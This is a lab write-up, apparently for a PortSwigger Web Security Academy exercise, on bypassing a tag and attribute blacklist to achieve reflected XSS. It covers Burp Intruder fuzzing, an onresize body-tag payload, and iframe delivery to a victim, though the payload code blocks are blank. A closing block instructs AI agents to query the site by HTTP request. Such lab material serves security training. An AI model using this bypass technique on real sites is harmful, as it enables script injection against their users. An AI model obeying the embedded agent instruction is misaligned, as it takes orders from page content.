# 14) Reflected XSS into HTML context with most tags and attributes blocked

#### Locate possible injection points As usual the first step is to analyse the application, we have a search functionnality so let's search for random string and then open the developer tools and find where the user input is located in the html

in the search let's put a normal tag

when we click on search we get `tag is not allowed`

so there is a blacklist mechnisme that blacklists tags send the search request to burp and send it to intruder * In Burp Intruder, in the Positions tab, replace the value of the search term with: `<>` * Place the cursor between the angle brackets and click "Add §" twice, to create a payload position. The value of the search term should now look like: `<§§>`

* Visit the [XSS cheat sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) and click "Copy tags to clipboard". * In Burp Intruder, in the Payloads tab, click "Paste" to paste the list of tags into the payloads list. click `start attack`

then click on status to find the one with 200 status

now let's try to use the body tag to trigger an xss

and the app also blacklists attributes

again doing the same thing let's find the allowed attribute * Visit the [XSS cheat sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) and click "copy events to clipboard". * In Burp Intruder, in the Payloads tab, click "Clear" to remove the previous payloads. Then click "Paste" to paste the list of attributes into the payloads list. Click "Start attack".

When the attack is finished, review the results. Note that all payloads caused an HTTP 400 response

now using the allowed tag and attribues let's construct a xss payload searching in the [portswigger xss cheat sheet list](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) i found a payload using onresize attribute which is allowed

``` xxxx" ```

if we resize the page then this is showed

so the payload is triggered succesfully now let's go to the exploit server and deliver this payload to the victim

we need to put our payload in an iframe and send it to the victim The print command needs to be performed automatically without any user interaction. Therefore I need a way to enforce the `resize` event without requiring the victim to do it. For this I use an iframe that contains the search that resizes on load ``` ``` I URL-encode the entire search term to ensure nothing goes amiss inside the iframe: ``` ```

deliver it now to the victim and the lab is solved

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://sayonara.gitbook.io/writeups/portswigger/xss/14-reflected-xss-into-html-context-with-most-tags-and-attributes-blocked.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.